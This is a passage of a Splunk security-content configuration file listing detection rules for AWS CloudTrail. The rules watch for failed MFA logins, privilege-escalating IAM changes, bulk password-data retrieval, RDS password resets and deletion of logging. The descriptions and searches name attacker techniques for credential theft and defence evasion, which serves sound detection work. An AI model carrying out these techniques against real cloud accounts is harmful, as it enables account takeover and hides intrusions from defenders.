action.escu.enabled = 1 description = The following analytic identifies an authentication attempt event against an AWS Console that fails during the Multi Factor Authentication challenge. AWS Cloudtrail logs provide a a very useful field called `additionalEventData` that logs information regarding usage of MFA. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1621"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an authentication attempt event against an AWS Console that fails during the Multi Factor Authentication challenge. AWS Cloudtrail logs provide a a very useful field called `additionalEventData` that logs information regarding usage of MFA. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.escu.how_to_implement = The Splunk AWS Add-on is required to utilize this data. The search requires AWS Cloudtrail logs. action.escu.known_false_positives = Legitimate users may miss to reply the MFA challenge within the time window or deny it by mistake. action.escu.creation_date = 2022-10-03 action.escu.modification_date = 2022-10-03 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Console Login Failed During MFA Challenge - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover", "Compromised User Account"] action.risk = 1 action.risk.param._risk_message = User $user_name$ failed to pass MFA challenge while logging into console from $src$ action.risk.param._risk = [{"risk_object_field": "user_name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Console Login Failed During MFA Challenge - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1621"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an authentication attempt event against an AWS Console that fails during the Multi Factor Authentication challenge. AWS Cloudtrail logs provide a a very useful field called `additionalEventData` that logs information regarding usage of MFA. This behavior may represent an adversary trying to authenticate with compromised credentials for an account that has multi-factor authentication enabled. action.notable.param.rule_title = AWS Console Login Failed During MFA Challenge action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName= ConsoleLogin errorMessage="Failed authentication" additionalEventData.MFAUsed = "Yes" | stats count min(_time) as firstTime max(_time) as lastTime by src eventName eventSource aws_account_id errorCode errorMessage userAgent eventID awsRegion user_name userIdentity.arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `aws_console_login_failed_during_mfa_challenge_filter` [ESCU - AWS Create Policy Version to allow all resources - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events where a user created a policy version that allows them to access any resource in their account. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user created a policy version that allows them to access any resource in their account. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created a policy to allow a user to access all resources. That said, AWS strongly advises against granting full control to all AWS resources and you must verify this activity. action.escu.creation_date = 2022-05-17 action.escu.modification_date = 2022-05-17 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Create Policy Version to allow all resources - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = User $user$ created a policy version that allows them to access any resource in their account. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Create Policy Version to allow all resources - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 13"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Exploitation", "Delivery", "Installation"], "mitre_attack": ["T1078.004", "T1078"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user created a policy version that allows them to access any resource in their account. action.notable.param.rule_title = AWS Create Policy Version to allow all resources action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=CreatePolicyVersion eventSource = iam.amazonaws.com errorCode = success | spath input=requestParameters.policyDocument output=key_policy_statements path=Statement{} | mvexpand key_policy_statements | spath input=key_policy_statements output=key_policy_action_1 path=Action | where key_policy_action_1 = "*" | stats count min(_time) as firstTime max(_time) as lastTime values(key_policy_statements) as policy_added by eventName eventSource aws_account_id errorCode userAgent eventID awsRegion user user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`|`aws_create_policy_version_to_allow_all_resources_filter` [ESCU - AWS CreateAccessKey - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection rule monitors for the creation of AWS Identity and Access Management (IAM) access keys. An IAM access key consists of an access key ID and secret access key, which are used to sign programmatic requests to AWS services. While IAM access keys can be legitimately used by developers and administrators for API access, their creation can also be indicative of malicious activity. Attackers who have gained unauthorized access to an AWS environment might create access keys as a means to establish persistence or to exfiltrate data through the APIs. Moreover, because access keys can be used to authenticate with AWS services without the need for further interaction, they can be particularly appealing for bad actors looking to operate under the radar. Consequently, it's important to vigilantly monitor and scrutinize access key creation events, especially if they are associated with unusual activity or are created by users who don't typically perform these actions. This hunting query identifies when a potentially compromised user creates a IAM access key for another user who may have higher privilleges, which can be a sign for privilege escalation. Hunting queries are designed to be executed manual during threat hunting. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection rule monitors for the creation of AWS Identity and Access Management (IAM) access keys. An IAM access key consists of an access key ID and secret access key, which are used to sign programmatic requests to AWS services. While IAM access keys can be legitimately used by developers and administrators for API access, their creation can also be indicative of malicious activity. Attackers who have gained unauthorized access to an AWS environment might create access keys as a means to establish persistence or to exfiltrate data through the APIs. Moreover, because access keys can be used to authenticate with AWS services without the need for further interaction, they can be particularly appealing for bad actors looking to operate under the radar. Consequently, it's important to vigilantly monitor and scrutinize access key creation events, especially if they are associated with unusual activity or are created by users who don't typically perform these actions. This hunting query identifies when a potentially compromised user creates a IAM access key for another user who may have higher privilleges, which can be a sign for privilege escalation. Hunting queries are designed to be executed manual during threat hunting. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created keys for another user. action.escu.creation_date = 2022-03-03 action.escu.modification_date = 2022-03-03 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS CreateAccessKey - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS CreateAccessKey - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 13"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = CreateAccessKey userAgent !=console.amazonaws.com errorCode = success | eval match=if(match(userIdentity.userName,requestParameters.userName),1,0) | search match=0 | stats count min(_time) as firstTime max(_time) as lastTime by requestParameters.userName src eventName eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.principalId user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` |`aws_createaccesskey_filter` [ESCU - AWS CreateLoginProfile - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events where a user A(victim A) creates a login profile for user B, followed by a AWS Console login event from user B from the same src_ip as user B. This correlated event can be indicative of privilege escalation since both events happened from the same src_ip action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user A(victim A) creates a login profile for user B, followed by a AWS Console login event from user B from the same src_ip as user B. This correlated event can be indicative of privilege escalation since both events happened from the same src_ip action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately created a login profile for another user. action.escu.creation_date = 2021-07-19 action.escu.modification_date = 2021-07-19 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS CreateLoginProfile - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ is attempting to create a login profile for $requestParameters.userName$ and did a console login from this IP $src_ip$ action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS CreateLoginProfile - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 13"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.003", "T1136"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for AWS CloudTrail events where a user A(victim A) creates a login profile for user B, followed by a AWS Console login event from user B from the same src_ip as user B. This correlated event can be indicative of privilege escalation since both events happened from the same src_ip action.notable.param.rule_title = AWS CreateLoginProfile action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = CreateLoginProfile | rename requestParameters.userName as new_login_profile | table src_ip eventName new_login_profile userIdentity.userName | join new_login_profile src_ip [| search `cloudtrail` eventName = ConsoleLogin | rename userIdentity.userName as new_login_profile | stats count values(eventName) min(_time) as firstTime max(_time) as lastTime by eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.principalId user_arn new_login_profile src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`] | `aws_createloginprofile_filter` [ESCU - AWS Credential Access Failed Login - Rule] action.escu = 0 action.escu.enabled = 1 description = It shows that there have been an unsuccessful attempt to log in using the user identity to the AWS management console. Since the user identity has access to AWS account services and resources, an attacker might try to brute force the password for that identity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.001"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = It shows that there have been an unsuccessful attempt to log in using the user identity to the AWS management console. Since the user identity has access to AWS account services and resources, an attacker might try to brute force the password for that identity. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = Users may genuinely mistype or forget the password. action.escu.creation_date = 2022-08-07 action.escu.modification_date = 2022-08-07 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Credential Access Failed Login - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user$ has a login failure from IP $src$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Credential Access Failed Login - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.001"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = It shows that there have been an unsuccessful attempt to log in using the user identity to the AWS management console. Since the user identity has access to AWS account services and resources, an attacker might try to brute force the password for that identity. action.notable.param.rule_title = AWS Credential Access Failed Login action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats count earliest(_time) as firstTime, latest(_time) as lastTime from datamodel=Authentication where Authentication.action = failure Authentication.app=AwsConsoleSignIn Authentication.signature=ConsoleLogin BY Authentication.app Authentication.signature Authentication.dest Authentication.user Authentication.action Authentication.user_id Authentication.src | `drop_dm_object_name(Authentication)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_credential_access_failed_login_filter` [ESCU - AWS Credential Access GetPasswordData - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection analytic identifies more than 10 GetPasswordData API calls made to your AWS account with a time window of 5 minutes. Attackers can retrieve the encrypted administrator password for a running Windows instance. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.001"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection analytic identifies more than 10 GetPasswordData API calls made to your AWS account with a time window of 5 minutes. Attackers can retrieve the encrypted administrator password for a running Windows instance. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. We encourage the users to adjust the values of `distinct_instance_ids` and tweak the `span` value according to their environment. action.escu.known_false_positives = Administrator tooling or automated scripts may make these calls but it is highly unlikely to make several calls in a short period of time. action.escu.creation_date = 2022-08-10 action.escu.modification_date = 2022-08-10 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Credential Access GetPasswordData - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ is seen to make mulitple `GetPasswordData` API calls to instance ids $instance_ids$ from IP $src_ip$ action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Credential Access GetPasswordData - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110", "T1110.001"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=GetPasswordData eventSource = ec2.amazonaws.com | bin _time span=5m | stats count values(errorCode) as errorCode dc(requestParameters.instanceId) as distinct_instance_ids values(requestParameters.instanceId) as instance_ids by aws_account_id src_ip user_arn userAgent eventName _time | where distinct_instance_ids > 10 | `aws_credential_access_getpassworddata_filter` [ESCU - AWS Credential Access RDS Password reset - Rule] action.escu = 0 action.escu.enabled = 1 description = The master user password for Amazon RDS DB instance can be reset using the Amazon RDS console. Using this technique, the attacker can get access to the sensitive data from the DB. Usually, the production databases may have sensitive data like Credit card information, PII, Health care Data. This event should be investigated further. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The master user password for Amazon RDS DB instance can be reset using the Amazon RDS console. Using this technique, the attacker can get access to the sensitive data from the DB. Usually, the production databases may have sensitive data like Credit card information, PII, Health care Data. This event should be investigated further. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = Users may genuinely reset the RDS password. action.escu.creation_date = 2024-03-19 action.escu.modification_date = 2024-03-19 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Credential Access RDS Password reset - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = $database_id$ password has been reset from IP $src$ action.risk.param._risk = [{"risk_object_field": "database_id", "risk_object_type": "system", "risk_score": 49}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Credential Access RDS Password reset - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1110"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The master user password for Amazon RDS DB instance can be reset using the Amazon RDS console. Using this technique, the attacker can get access to the sensitive data from the DB. Usually, the production databases may have sensitive data like Credit card information, PII, Health care Data. This event should be investigated further. action.notable.param.rule_title = AWS Credential Access RDS Password reset action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource="rds.amazonaws.com" eventName=ModifyDBInstance "requestParameters.masterUserPassword"=* | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.dBInstanceIdentifier) as database_id by src awsRegion eventName userAgent user_arn| `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_credential_access_rds_password_reset_filter` [ESCU - AWS Cross Account Activity From Previously Unseen Account - Rule] action.escu = 0 action.escu.enabled = 1 description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for AssumeRole events where an IAM role in a different account is requested for the first time. action.escu.mappings = {"cis20": ["CIS 13"], "nist": ["DE.AE"]} action.escu.data_models = ["Authentication"] action.escu.eli5 = This search looks for AssumeRole events where an IAM role in a different account is requested for the first time. action.escu.how_to_implement = You must be ingesting your cloud infrastructure logs from your cloud provider. You should run the baseline search `Previously Seen AWS Cross Account Activity - Initial` to build the initial table of source IP address, geographic locations, and times. You must also enable the second baseline search `Previously Seen AWS Cross Account Activity - Update` to keep this table up to date and to age out old data. You can also provide additional filtering for this search by customizing the `aws_cross_account_activity_from_previously_unseen_account_filter` macro. action.escu.known_false_positives = Using multiple AWS accounts and roles is perfectly valid behavior. It's suspicious when an account requests privileges of an account it hasn't before. You should validate with the account owner that this is a legitimate request. action.escu.creation_date = 2020-05-28 action.escu.modification_date = 2020-05-28 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Cross Account Activity From Previously Unseen Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Suspicious Cloud Authentication Activities"] action.risk = 1 action.risk.param._risk_message = AWS account $requestingAccountId$ is trying to access resource from some other account $requestedAccountId$, for the first time. action.risk.param._risk = [{"risk_object_field": "requestingAccountId", "risk_object_type": "other", "risk_score": 15}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 15}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Experimental - AWS Cross Account Activity From Previously Unseen Account - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Authentication Activities"], "cis20": ["CIS 13"], "confidence": 50, "impact": 30, "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats min(_time) as firstTime max(_time) as lastTime from datamodel=Authentication where Authentication.signature=AssumeRole by Authentication.vendor_account Authentication.user Authentication.src Authentication.user_role | `drop_dm_object_name(Authentication)` | rex field=user_role "arn:aws:sts:*:(?.*):" | where vendor_account != dest_account | rename vendor_account as requestingAccountId dest_account as requestedAccountId | lookup previously_seen_aws_cross_account_activity requestingAccountId, requestedAccountId, OUTPUTNEW firstTime | eval status = if(firstTime > relative_time(now(), "-24h@h"),"New Cross Account Activity","Previously Seen") | where status = "New Cross Account Activity" | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `aws_cross_account_activity_from_previously_unseen_account_filter` [ESCU - AWS Defense Evasion Delete Cloudtrail - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the the entire cloudtrail that is logging activities in the environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the the entire cloudtrail that is logging activities in the environment. action.escu.how_to_implement = You must install Splunk AWS Add on and enable CloudTrail logs in your AWS Environment. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has stopped cloudTrail logging. Please investigate this activity. action.escu.creation_date = 2022-07-13 action.escu.modification_date = 2022-07-13 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Defense Evasion Delete Cloudtrail - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Defense Evasion"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has delete a CloudTrail logging for account id $aws_account_id$ from IP $src$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Defense Evasion Delete Cloudtrail - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.008", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies AWS `DeleteTrail` events within CloudTrail logs. Adversaries often try to impair their target's defenses by stopping their malicious activity from being logged, so that they may operate with stealth and avoid detection. When the adversary has the right type of permissions in the compromised AWS environment, they may delete the the entire cloudtrail that is logging activities in the environment. action.notable.param.rule_title = AWS Defense Evasion Delete Cloudtrail action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = DeleteTrail eventSource = cloudtrail.amazonaws.com userAgent !=console.amazonaws.com errorCode = success| stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.name) as deleted_cloudtrail_name by src region eventName userAgent user_arn aws_account_id | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `aws_defense_evasion_delete_cloudtrail_filter` [ESCU - AWS Defense Evasion Delete CloudWatch Log Group - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment. action.escu.how_to_implement = You must install Splunk AWS Add on and enable CloudTrail logs in your AWS Environment. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has deleted CloudWatch logging. Please investigate this activity. action.escu.creation_date = 2022-07-17 action.escu.modification_date = 2022-07-17 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Defense Evasion Delete CloudWatch Log Group - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Defense Evasion"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has deleted a CloudWatch logging group for account id $aws_account_id$ from IP $src$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Defense Evasion Delete CloudWatch Log Group - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Defense Evasion"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562", "T1562.008"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies AWS `DeleteLogGroup` events in CloudTrail logs. Attackers may evade the logging capability by deleting the log group in CloudWatch. This will stop sending the logs and metrics to CloudWatch. When the adversary has the right type of permissions within the compromised AWS environment, they may delete the CloudWatch log group that is logging activities in the environment. action.notable.param.rule_title = AWS Defense Evasion Delete CloudWatch Log Group action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = DeleteLogGroup eventSource = logs.amazonaws.com userAgent !=console.amazonaws.com errorCode = success| stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.logGroupName) as log_group_name by src region eventName userAgent user_arn aws_account_id | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)`| `aws_defense_evasion_delete_cloudwatch_log_group_filter` [ESCU - AWS Defense Evasion Impair Security Services - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for several delete specific API calls made to AWS Security Services like CloudWatch, GuardDuty and Web Application Firewalls. These API calls are often leveraged by adversaries to weaken existing security defenses by deleting logging configurations in the 